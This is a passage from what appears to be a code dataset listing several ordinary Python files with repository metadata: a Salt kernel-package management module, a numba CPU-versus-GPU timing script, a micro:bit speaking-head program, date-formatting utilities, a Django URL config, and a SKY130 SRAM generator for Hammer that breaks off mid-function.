Return a list of all installed kernels.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.list_installed
"""
pkg_re = re.compile(r"^{}-[\d.-]+-{}$".format(_package_prefix(), _kernel_type()))
pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True)
if pkgs is None:
pkgs = []
result = list(filter(pkg_re.match, pkgs))
if result is None:
return []
prefix_len = len(_package_prefix()) + 1
return sorted(
[pkg[prefix_len:] for pkg in result], key=functools.cmp_to_key(_cmp_version)
)
def latest_available():
"""
Return the version of the latest kernel from the package repositories.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_available
"""
result = __salt__["pkg.latest_version"](
"{}-{}".format(_package_prefix(), _kernel_type())
)
if result == "":
return latest_installed()
version = re.match(r"^(\d+\.\d+\.\d+)\.(\d+)", result)
return "{}-{}-{}".format(version.group(1), version.group(2), _kernel_type())
def latest_installed():
"""
Return the version of the latest installed kernel.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.latest_installed
.. note::
This function may not return the same value as
:py:func:`~salt.modules.kernelpkg_linux_apt.active` if a new kernel
has been installed and the system has not yet been rebooted.
The :py:func:`~salt.modules.kernelpkg_linux_apt.needs_reboot` function
exists to detect this condition.
"""
pkgs = list_installed()
if pkgs:
return pkgs[-1]
return None
def needs_reboot():
"""
Detect if a new kernel version has been installed but is not running.
Returns True if a new kernel is installed, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.needs_reboot
"""
return _LooseVersion(active()) < _LooseVersion(latest_installed())
def upgrade(reboot=False, at_time=None):
"""
Upgrade the kernel and optionally reboot the system.
reboot : False
Request a reboot if a new kernel is available.
at_time : immediate
Schedule the reboot at some point in the future. This argument
is ignored if ``reboot=False``. See
:py:func:`~salt.modules.system.reboot` for more details
on this argument.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade
salt '*' kernelpkg.upgrade reboot=True at_time=1
.. note::
An immediate reboot often shuts down the system before the minion has a
chance to return, resulting in errors. A minimal delay (1 minute) is
useful to ensure the result is delivered to the master.
"""
result = __salt__["pkg.install"](
name="{}-{}".format(_package_prefix(), latest_available())
)
_needs_reboot = needs_reboot()
ret = {
"upgrades": result,
"active": active(),
"latest_installed": latest_installed(),
"reboot_requested": reboot,
"reboot_required": _needs_reboot,
}
if reboot and _needs_reboot:
log.warning("Rebooting system due to kernel upgrade")
__salt__["system.reboot"](at_time=at_time)
return ret
def upgrade_available():
"""
Detect if a new kernel version is available in the repositories.
Returns True if a new kernel is available, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade_available
"""
return _LooseVersion(latest_available()) > _LooseVersion(latest_installed())
def remove(release):
"""
Remove a specific version of the kernel.
release
The release number of an installed kernel. This must be the entire release
number as returned by :py:func:`~salt.modules.kernelpkg_linux_apt.list_installed`,
not the package name.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.remove 4.4.0-70-generic
"""
if release not in list_installed():
raise CommandExecutionError(
"Kernel release '{}' is not installed".format(release)
)
if release == active():
raise CommandExecutionError("Active kernel cannot be removed")
target = "{}-{}".format(_package_prefix(), release)
log.info("Removing kernel package %s", target)
__salt__["pkg.purge"](target)
return {"removed": [target]}
def cleanup(keep_latest=True):
"""
Remove all unused kernel packages from the system.
keep_latest : True
In the event that the active kernel is not the latest one installed, setting this to True
will retain the latest kernel package, in addition to the active one. If False, all kernel
packages other than the active one will be removed.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.cleanup
"""
removed = []
# Loop over all installed kernel packages
for kernel in list_installed():
# Keep the active kernel package
if kernel == active():
continue
# Optionally keep the latest kernel package
if keep_latest and kernel == latest_installed():
continue
# Remove the kernel package
removed.extend(remove(kernel)["removed"])
return {"removed": removed}
def _package_prefix():
"""
Return static string for the package prefix
"""
return "linux-image"
def _kernel_type():
"""
Parse the kernel name and return its type
"""
return re.match(r"^[\d.-]+-(.+)$", active()).group(1)
def _cmp_version(item1, item2):
"""
Compare function for package version sorting
"""
vers1 = _LooseVersion(item1)
vers2 = _LooseVersion(item2)
if vers1 < vers2:
return -1
if vers1 > vers2:
return 1
return 0
| en | 0.687914 | Manage Linux kernel packages on APT-based systems Load this module on Debian-based systems only Return the version of the running kernel. CLI Example: .. code-block:: bash salt '*' kernelpkg.active Return a list of all installed kernels. CLI Example: .. code-block:: bash salt '*' kernelpkg.list_installed Return the version of the latest kernel from the package repositories. CLI Example: .. code-block:: bash salt '*' kernelpkg.latest_available Return the version of the latest installed kernel. CLI Example: .. code-block:: bash salt '*' kernelpkg.latest_installed .. note:: This function may not return the same value as :py:func:`~salt.modules.kernelpkg_linux_apt.active` if a new kernel has been installed and the system has not yet been rebooted. The :py:func:`~salt.modules.kernelpkg_linux_apt.needs_reboot` function exists to detect this condition. Detect if a new kernel version has been installed but is not running. Returns True if a new kernel is installed, False otherwise. CLI Example: .. code-block:: bash salt '*' kernelpkg.needs_reboot Upgrade the kernel and optionally reboot the system. reboot : False Request a reboot if a new kernel is available. at_time : immediate Schedule the reboot at some point in the future. This argument is ignored if ``reboot=False``. See :py:func:`~salt.modules.system.reboot` for more details on this argument. CLI Example: .. code-block:: bash salt '*' kernelpkg.upgrade salt '*' kernelpkg.upgrade reboot=True at_time=1 .. note:: An immediate reboot often shuts down the system before the minion has a chance to return, resulting in errors. A minimal delay (1 minute) is useful to ensure the result is delivered to the master. Detect if a new kernel version is available in the repositories. Returns True if a new kernel is available, False otherwise. CLI Example: .. code-block:: bash salt '*' kernelpkg.upgrade_available Remove a specific version of the kernel. release The release number of an installed kernel. This must be the entire release number as returned by :py:func:`~salt.modules.kernelpkg_linux_apt.list_installed`, not the package name. CLI Example: .. code-block:: bash salt '*' kernelpkg.remove 4.4.0-70-generic Remove all unused kernel packages from the system. keep_latest : True In the event that the active kernel is not the latest one installed, setting this to True will retain the latest kernel package, in addition to the active one. If False, all kernel packages other than the active one will be removed. CLI Example: .. code-block:: bash salt '*' kernelpkg.cleanup # Loop over all installed kernel packages # Keep the active kernel package # Optionally keep the latest kernel package # Remove the kernel package Return static string for the package prefix Parse the kernel name and return its type Compare function for package version sorting | 2.42308 | 2 |
main.py | david-slatinek/running-a-program-on-the-CPU-vs.-on-the-GPU | 0 | 8078 | <gh_stars>0
import json
import numpy as np
from numba import jit
from timeit import default_timer as timer
# Constant, used in the formula.
# Defined here to speed up the calculation, i.e. it's calculated only once
# and then placed in the formula.
SQRT_2PI = np.float32(np.sqrt(2 * np.pi))
# This function will run on the CPU.
def gaussian_cpu(values, mean, sigma):
"""Calculate values of the Gaussian function.
:param values: list, function input parameters.
:param mean: float, arithmetic mean.
:param sigma: float, standard deviation.
:return: list.
"""
result = np.zeros_like(values)
for index, item in enumerate(values):
result[index] = (1 / (sigma * SQRT_2PI)) * (np.e ** (-0.5 * ((item - mean) / sigma) ** 2))
return result
# This function will run on the GPU.
gaussian_gpu = jit(gaussian_cpu)
def write_to_file(name, values):
"""Write results to a file.
:param name: string, file name, only prefix.
:param values: dictionary, values to write.
"""
with open(name + ".json", 'w') as f:
json.dump(values, f, indent=4)
if __name__ == "__main__":
# Randomly generated values.
x = np.random.uniform(-3, 3, size=1000000).astype(np.float32)
# Randomly generated mean.
m = np.random.uniform(1, 10)
# Randomly generated standard deviation.
s = np.random.uniform(1, 10)
# The number of rounds.
n = 1
# Used to store execution time.
time_results = {}
for i in range(n):
start = timer()
gaussian_cpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("cpu", time_results)
for i in range(n):
start = timer()
gaussian_gpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("gpu", time_results)
| import json
import numpy as np
from numba import jit
from timeit import default_timer as timer
# Constant, used in the formula.
# Defined here to speed up the calculation, i.e. it's calculated only once
# and then placed in the formula.
SQRT_2PI = np.float32(np.sqrt(2 * np.pi))
# This function will run on the CPU.
def gaussian_cpu(values, mean, sigma):
"""Calculate values of the Gaussian function.
:param values: list, function input parameters.
:param mean: float, arithmetic mean.
:param sigma: float, standard deviation.
:return: list.
"""
result = np.zeros_like(values)
for index, item in enumerate(values):
result[index] = (1 / (sigma * SQRT_2PI)) * (np.e ** (-0.5 * ((item - mean) / sigma) ** 2))
return result
# This function will run on the GPU.
gaussian_gpu = jit(gaussian_cpu)
def write_to_file(name, values):
"""Write results to a file.
:param name: string, file name, only prefix.
:param values: dictionary, values to write.
"""
with open(name + ".json", 'w') as f:
json.dump(values, f, indent=4)
if __name__ == "__main__":
# Randomly generated values.
x = np.random.uniform(-3, 3, size=1000000).astype(np.float32)
# Randomly generated mean.
m = np.random.uniform(1, 10)
# Randomly generated standard deviation.
s = np.random.uniform(1, 10)
# The number of rounds.
n = 1
# Used to store execution time.
time_results = {}
for i in range(n):
start = timer()
gaussian_cpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("cpu", time_results)
for i in range(n):
start = timer()
gaussian_gpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("gpu", time_results) | en | 0.742629 | # Constant, used in the formula. # Defined here to speed up the calculation, i.e. it's calculated only once # and then placed in the formula. # This function will run on the CPU. Calculate values of the Gaussian function. :param values: list, function input parameters. :param mean: float, arithmetic mean. :param sigma: float, standard deviation. :return: list. # This function will run on the GPU. Write results to a file. :param name: string, file name, only prefix. :param values: dictionary, values to write. # Randomly generated values. # Randomly generated mean. # Randomly generated standard deviation. # The number of rounds. # Used to store execution time. | 3.121527 | 3 |
src/jj_analyzer/__init__.py | ninetymiles/jj-logcat-analyzer | 0 | 8079 | #! /usr/bin/python
import sys
if sys.version_info[0] == 3:
from .__main__ import *
else:
pass | #! /usr/bin/python
import sys
if sys.version_info[0] == 3:
from .__main__ import *
else:
pass | fr | 0.245098 | #! /usr/bin/python | 1.264367 | 1 |
utility_functions.py | Team-501-The-PowerKnights/Powerknights-Slack-Bot | 1 | 8080 | import datetime
def iso_extract_info(string):
"""
Will get all of the info and return it as an array
:param string: ISO formatted string that will be used for extraction
:return: array [year, month, day, military_time_hour, minutes, hours]
:note: every item is an int except for minutes
:note: hours only is there is military_time_hour is greater than 12
"""
elements = []
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
hours = 0
elements.append(year_int)
elements.append(month_int)
elements.append(day_int)
elements.append(minutes_int)
if military_time_hours_int > 12:
hours += military_time_hours_int - 12
elements.append(hours)
return elements
# # Testing:
# print("[year, month, day, military_time_hour, minutes, hours]")
# print(iso_extract_info('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def iso_format_to_regular(string):
"""
Will take a string that is an iso formatted string and make it look readable
:param string: the iso formatted string
:return: str
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
if military_time_hours_int > 12:
hours = military_time_hours_int - 12
final_string = "{month}/{day}/{year} {hour}:{minute}PM".format(
month=month_int, day=day_int, year=year_int, hour=hours, minute=minutes_int)
return final_string
else:
final_string = "{month}/{day}/{year} {hour}:{minute}AM".format(
month=month_int, day=day_int, year=year_int, hour=military_time_hours_int, minute=minutes_int)
return final_string
# Testing:
# print(iso_format_to_regular('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def fix_time(strange_date):
"""
Will rearrange the strange date that Google gives and repalce it with the normal string.
:param strange_date: strange time that google gives when an event is marked as "all day"
:return: str
"""
items = strange_date.split("-")
year_int = int(items[0])
month_int = int(items[1])
day_int = int(items[2])
new_str = "{month}/{day}/{year}".format(
month=month_int, day=day_int, year=year_int)
return new_str
# Doesn't use the "iso_extract_info" function
def multiday_checker_STRANGE(start_date, end_date):
"""
Will check if an event is more than day long
:param start_date: Strange Google formatted date of the start of the event
:param end_date: Strange Google formatted date of the end of the event
:return: Boolean
"""
start_date_items = start_date.split("-")
end_date_items = end_date.split("-")
start_date_sum = 0
end_date_sum = 0
for string in start_date_items:
number = int(string)
start_date_sum += number
for string in end_date_items:
number = int(string)
end_date_sum += number
date_dif = start_date_sum - end_date_sum
if date_dif > 2:
return True
else:
return False
# Testing:
# print(multiday_checker_STRANGE('2019-04-21', '2019-04-22'))
# Doesn't use the "iso_extract_info" function
def STRANGE_string_weekday(string):
"""
Will take a string that is a date formatted in the Google format and find what day of the week it is
:param string: Google formatted string for the date
:return: string
"""
items = string.split("/")
year_int = int(items[2])
month_int = int(items[0])
day_int = int(items[1])
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(STRANGE_string_weekday("2019-04-27"))
# Doesn't use the "iso_extract_info" function
def ISO_string_weekday(string):
"""
Will take a string that is a date formatted in the ISO format and find what day of the week it is
:param string: ISO formatted string for the date
:return: string
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(ISO_string_weekday('2019-06-28T16:00:00-04:00'))
| import datetime
def iso_extract_info(string):
"""
Will get all of the info and return it as an array
:param string: ISO formatted string that will be used for extraction
:return: array [year, month, day, military_time_hour, minutes, hours]
:note: every item is an int except for minutes
:note: hours only is there is military_time_hour is greater than 12
"""
elements = []
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
hours = 0
elements.append(year_int)
elements.append(month_int)
elements.append(day_int)
elements.append(minutes_int)
if military_time_hours_int > 12:
hours += military_time_hours_int - 12
elements.append(hours)
return elements
# # Testing:
# print("[year, month, day, military_time_hour, minutes, hours]")
# print(iso_extract_info('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def iso_format_to_regular(string):
"""
Will take a string that is an iso formatted string and make it look readable
:param string: the iso formatted string
:return: str
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
if military_time_hours_int > 12:
hours = military_time_hours_int - 12
final_string = "{month}/{day}/{year} {hour}:{minute}PM".format(
month=month_int, day=day_int, year=year_int, hour=hours, minute=minutes_int)
return final_string
else:
final_string = "{month}/{day}/{year} {hour}:{minute}AM".format(
month=month_int, day=day_int, year=year_int, hour=military_time_hours_int, minute=minutes_int)
return final_string
# Testing:
# print(iso_format_to_regular('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def fix_time(strange_date):
"""
Will rearrange the strange date that Google gives and repalce it with the normal string.
:param strange_date: strange time that google gives when an event is marked as "all day"
:return: str
"""
items = strange_date.split("-")
year_int = int(items[0])
month_int = int(items[1])
day_int = int(items[2])
new_str = "{month}/{day}/{year}".format(
month=month_int, day=day_int, year=year_int)
return new_str
# Doesn't use the "iso_extract_info" function
def multiday_checker_STRANGE(start_date, end_date):
"""
Will check if an event is more than day long
:param start_date: Strange Google formatted date of the start of the event
:param end_date: Strange Google formatted date of the end of the event
:return: Boolean
"""
start_date_items = start_date.split("-")
end_date_items = end_date.split("-")
start_date_sum = 0
end_date_sum = 0
for string in start_date_items:
number = int(string)
start_date_sum += number
for string in end_date_items:
number = int(string)
end_date_sum += number
date_dif = start_date_sum - end_date_sum
if date_dif > 2:
return True
else:
return False
# Testing:
# print(multiday_checker_STRANGE('2019-04-21', '2019-04-22'))
# Doesn't use the "iso_extract_info" function
def STRANGE_string_weekday(string):
"""
Will take a string that is a date formatted in the Google format and find what day of the week it is
:param string: Google formatted string for the date
:return: string
"""
items = string.split("/")
year_int = int(items[2])
month_int = int(items[0])
day_int = int(items[1])
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(STRANGE_string_weekday("2019-04-27"))
# Doesn't use the "iso_extract_info" function
def ISO_string_weekday(string):
"""
Will take a string that is a date formatted in the ISO format and find what day of the week it is
:param string: ISO formatted string for the date
:return: string
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(ISO_string_weekday('2019-06-28T16:00:00-04:00'))
| en | 0.687177 | Will get all of the info and return it as an array :param string: ISO formatted string that will be used for extraction :return: array [year, month, day, military_time_hour, minutes, hours] :note: every item is an int except for minutes :note: hours only is there is military_time_hour is greater than 12 # # Testing: # print("[year, month, day, military_time_hour, minutes, hours]") # print(iso_extract_info('2019-04-27T16:00:00-04:00')) # Doesn't use the "iso_extract_info" function Will take a string that is an iso formatted string and make it look readable :param string: the iso formatted string :return: str # Testing: # print(iso_format_to_regular('2019-04-27T16:00:00-04:00')) # Doesn't use the "iso_extract_info" function Will rearrange the strange date that Google gives and repalce it with the normal string. :param strange_date: strange time that google gives when an event is marked as "all day" :return: str # Doesn't use the "iso_extract_info" function Will check if an event is more than day long :param start_date: Strange Google formatted date of the start of the event :param end_date: Strange Google formatted date of the end of the event :return: Boolean # Testing: # print(multiday_checker_STRANGE('2019-04-21', '2019-04-22')) # Doesn't use the "iso_extract_info" function Will take a string that is a date formatted in the Google format and find what day of the week it is :param string: Google formatted string for the date :return: string # Testing: # print(STRANGE_string_weekday("2019-04-27")) # Doesn't use the "iso_extract_info" function Will take a string that is a date formatted in the ISO format and find what day of the week it is :param string: ISO formatted string for the date :return: string # Testing: # print(ISO_string_weekday('2019-06-28T16:00:00-04:00')) | 4.180344 | 4 |
python/ch_06_Animatronic_Head.py | tallamjr/mbms | 18 | 8081 | <gh_stars>10-100
from microbit import *
import random, speech, radio
eye_angles = [50, 140, 60, 90, 140]
radio.off()
sentences = [
"Hello my name is Mike",
"What is your name",
"I am looking at you",
"Exterminate exterminate exterminate",
"Number Five is alive",
"I cant do that Dave",
"daisee daisee give me your answer do"
]
lips0 = Image("00000:"
"00000:"
"99999:"
"00000:"
"00000")
lips1 = Image("00000:"
"00900:"
"99099:"
"00900:"
"00000")
lips2 = Image("00000:"
"09990:"
"99099:"
"09990:"
"00000")
lips = [lips0, lips1, lips2]
def set_servo_angle(pin, angle):
duty = 26 + (angle * 51) / 90
pin.write_analog(duty)
def speak(sentence):
words = sentence.split()
for i in range(0, len(words)):
display.show(random.choice(lips))
speech.say(words[i])
display.show(lips0)
def act():
set_servo_angle(pin2, random.choice(eye_angles))
sleep(300)
speak(random.choice(sentences))
set_servo_angle(pin2, 90)
base_z = 0
while True:
new_z = abs(accelerometer.get_z())
if abs(new_z - base_z) > 20:
base_z = new_z
act()
if random.randint(0, 1000) == 0: # say something 1 time in 1000
act()
sleep(200)
| from microbit import *
import random, speech, radio
eye_angles = [50, 140, 60, 90, 140]
radio.off()
sentences = [
"Hello my name is Mike",
"What is your name",
"I am looking at you",
"Exterminate exterminate exterminate",
"Number Five is alive",
"I cant do that Dave",
"daisee daisee give me your answer do"
]
lips0 = Image("00000:"
"00000:"
"99999:"
"00000:"
"00000")
lips1 = Image("00000:"
"00900:"
"99099:"
"00900:"
"00000")
lips2 = Image("00000:"
"09990:"
"99099:"
"09990:"
"00000")
lips = [lips0, lips1, lips2]
def set_servo_angle(pin, angle):
duty = 26 + (angle * 51) / 90
pin.write_analog(duty)
def speak(sentence):
words = sentence.split()
for i in range(0, len(words)):
display.show(random.choice(lips))
speech.say(words[i])
display.show(lips0)
def act():
set_servo_angle(pin2, random.choice(eye_angles))
sleep(300)
speak(random.choice(sentences))
set_servo_angle(pin2, 90)
base_z = 0
while True:
new_z = abs(accelerometer.get_z())
if abs(new_z - base_z) > 20:
base_z = new_z
act()
if random.randint(0, 1000) == 0: # say something 1 time in 1000
act()
sleep(200) | en | 0.845864 | # say something 1 time in 1000 | 3.224124 | 3 |
debugtalk.py | caoyp2/HRunDemo | 0 | 8082 | <filename>debugtalk.py
import datetime
import time
def sleep(n_secs):
time.sleep(n_secs)
def get_timestamp():
dtime = datetime.datetime.now()
un_time = time.mktime(dtime.timetuple())
return str(un_time)
def print_docId(docId):
print(docId)
def print_phonepass(phone,password):
print(phone + "---------" + password)
| <filename>debugtalk.py
import datetime
import time
def sleep(n_secs):
time.sleep(n_secs)
def get_timestamp():
dtime = datetime.datetime.now()
un_time = time.mktime(dtime.timetuple())
return str(un_time)
def print_docId(docId):
print(docId)
def print_phonepass(phone,password):
print(phone + "---------" + password)
| none | 1 | 2.687747 | 3 |
|
hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 7 | 8083 | from django.urls import path
from issue_template.views import IssueTemplateView
urlpatterns = [
path(
'<str:owner>/<str:repo>/<str:token_auth>/',
IssueTemplateView.as_view()
),
]
| from django.urls import path
from issue_template.views import IssueTemplateView
urlpatterns = [
path(
'<str:owner>/<str:repo>/<str:token_auth>/',
IssueTemplateView.as_view()
),
]
| none | 1 | 1.530356 | 2 |
|
src/hammer-vlsi/technology/sky130/sram_compiler/__init__.py | httpsgithu/hammer | 138 | 8084 | <reponame>httpsgithu/hammer
import os, tempfile, subprocess
from hammer_vlsi import MMMCCorner, MMMCCornerType, HammerTool, HammerToolStep, HammerSRAMGeneratorTool, SRAMParameters
from hammer_vlsi.units import VoltageValue, TemperatureValue
from hammer_tech import Library, ExtraLibrary
from typing import NamedTuple, Dict, Any, List
from abc import ABCMeta, abstractmethod
class SKY130SRAMGenerator(HammerSRAMGeneratorTool):
def tool_config_prefix(self) -> str:
return "sram_generator.sky130"
def version_number(self, version: str) -> int:
return 0
# Run generator for a single sram and corner
def generate_sram(self, params: SRAMParameters, corner: MMMCCorner) -> ExtraLibrary:
tech_cache_dir = os.path.abspath(self.technology.cache_dir)
#TODO: this is really an abuse of the corner stuff
if corner.type == MMMCCornerType.Setup:
speed_name = "slow"
speed = "SS"
elif corner.type == MMMCCornerType.Hold:
speed_name = "fast"
speed = "FF"
elif corner.type == MMMCCornerType.Extra:
speed_name = "typical"
speed = "TT"
# Different target memories based on port count
# if params.family == "1rw":
# self.logger.info("Compiling 1rw memories to DFFRAM instances")
# base_dir = self.get_setting("technology.sky130.dffram_lib")
# fam_code = params.family
# sram_name = "RAM{d}x{w}".format(
# d=params.depth,
# w=params.width)
# #TODO: need real libs (perhaps run Liberate here?)
# #For now, use the dummy lib for all corners
# corner_str = "" #
# lib_path = "{b}/{n}.lib".format(
# b=base_dir,
# n=sram_name)
# if not os.path.exists(lib_path):
# self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
# return ExtraLibrary(prefix=None, library=Library(
# name=sram_name,
# nldm_liberty_file=lib_path,
# lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
# #TODO: GDS not generated. Unclear which DEF to use?
# #gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
# spice_file="{b}/{n}/{n}.spice".format(b=base_dir,n=sram_name),
# #TODO: Will not work as-is for behav. sim (this is a structural netlist referencing std. cells)
# #Need to add std cell behavioral Verilog to sim.inputs.input_files
# verilog_sim="{b}/{n}/{n}.nl.v".format(b=base_dir,n=sram_name),
# corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
# supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
# provides=[{'lib_type': "sram", 'vt': params.vt}]))
# elif params.family == "1rw1r":
if params.family == "1rw":
self.logger.info("Compiling 1rw1r memories to OpenRAM instances")
base_dir = self.get_setting("technology.sky130.openram_lib")
fam_code = params.family
s=round(round(params.width*params.depth/8, -3)/1000) # size in kiB
w=params.width
d=params.depth
m=8
sram_name = f"sky130_sram_{s}kbyte_1rw1r_{w}x{d}_{m}"
print(f"SRAM_NAME: {sram_name}")
#TODO: Hammer SRAMParameters doesn't have this info
#TODO: replace this if OpenRAM characterization done for other corners
#For now, use typical lib for all corners
corner_str = "TT_1p8V_25C"
#corner_str = "{speed}_{volt}V_{temp}C".format(
# speed = speed,
# volt = str(corner.voltage.value_in_units("V")).replace(".","p"),
# temp = str(int(corner.temp.value_in_units("C"))).replace(".","p"))
lib_path = "{b}/{n}/{n}_{c}.lib".format(
b=base_dir,
n=sram_name,
c=corner_str)
if not os.path.exists(lib_path):
self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
return ExtraLibrary(prefix=None, library=Library(
name=sram_name,
nldm_liberty_file=lib_path,
lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
spice_file="{b}/{n}/{n}.lvs.sp".format(b=base_dir,n=sram_name),
verilog_sim="{b}/{n}/{n}.v".format(b=base_dir,n=sram_name),
corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
provides=[{'lib_type': "sram", 'vt': params.vt}]))
else:
self.logger.error("SKY130 SRAM cache does not support family:{f}".format(f=params.family))
return ExtraLibrary(prefix=None, library=None)
tool=SKY130SRAMGenerator
| import os, tempfile, subprocess
from hammer_vlsi import MMMCCorner, MMMCCornerType, HammerTool, HammerToolStep, HammerSRAMGeneratorTool, SRAMParameters
from hammer_vlsi.units import VoltageValue, TemperatureValue
from hammer_tech import Library, ExtraLibrary
from typing import NamedTuple, Dict, Any, List
from abc import ABCMeta, abstractmethod
class SKY130SRAMGenerator(HammerSRAMGeneratorTool):
def tool_config_prefix(self) -> str:
return "sram_generator.sky130"
def version_number(self, version: str) -> int:
return 0
# Run generator for a single sram and corner
def generate_sram(self, params: SRAMParameters, corner: MMMCCorner) -> ExtraLibrary:
tech_cache_dir = os.path.abspath(self.technology.cache_dir)
#TODO: this is really an abuse of the corner stuff
if corner.type == MMMCCornerType.Setup:
speed_name = "slow"
speed = "SS"
elif corner.type == MMMCCornerType.Hold:
speed_name = "fast"
speed = "FF"
elif corner.type == MMMCCornerType.Extra:
speed_name = "typical"
speed = "TT"
# Different target memories based on port count
# if params.family == "1rw":
# self.logger.info("Compiling 1rw memories to DFFRAM instances")
# base_dir = self.get_setting("technology.sky130.dffram_lib")
# fam_code = params.family
# sram_name = "RAM{d}x{w}".format(
# d=params.depth,
# w=params.width)
# #TODO: need real libs (perhaps run Liberate here?)
# #For now, use the dummy lib for all corners
# corner_str = "" #
# lib_path = "{b}/{n}.lib".format(
# b=base_dir,
# n=sram_name)
# if not os.path.exists(lib_path):
# self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
# return ExtraLibrary(prefix=None, library=Library(
# name=sram_name,
# nldm_liberty_file=lib_path,
# lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
# #TODO: GDS not generated. Unclear which DEF to use?
# #gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
# spice_file="{b}/{n}/{n}.spice".format(b=base_dir,n=sram_name),
# #TODO: Will not work as-is for behav. sim (this is a structural netlist referencing std. cells)
# #Need to add std cell behavioral Verilog to sim.inputs.input_files
# verilog_sim="{b}/{n}/{n}.nl.v".format(b=base_dir,n=sram_name),
# corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
# supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
# provides=[{'lib_type': "sram", 'vt': params.vt}]))
# elif params.family == "1rw1r":
if params.family == "1rw":
self.logger.info("Compiling 1rw1r memories to OpenRAM instances")
base_dir = self.get_setting("technology.sky130.openram_lib")
fam_code = params.family
s=round(round(params.width*params.depth/8, -3)/1000) # size in kiB
w=params.width
d=params.depth
m=8
sram_name = f"sky130_sram_{s}kbyte_1rw1r_{w}x{d}_{m}"
print(f"SRAM_NAME: {sram_name}")
#TODO: Hammer SRAMParameters doesn't have this info
#TODO: replace this if OpenRAM characterization done for other corners
#For now, use typical lib for all corners
corner_str = "TT_1p8V_25C"
#corner_str = "{speed}_{volt}V_{temp}C".format(
# speed = speed,
# volt = str(corner.voltage.value_in_units("V")).replace(".","p"),
# temp = str(int(corner.temp.value_in_units("C"))).replace(".","p"))
lib_path = "{b}/{n}/{n}_{c}.lib".format(
b=base_dir,
n=sram_name,
c=corner_str)
if not os.path.exists(lib_path):
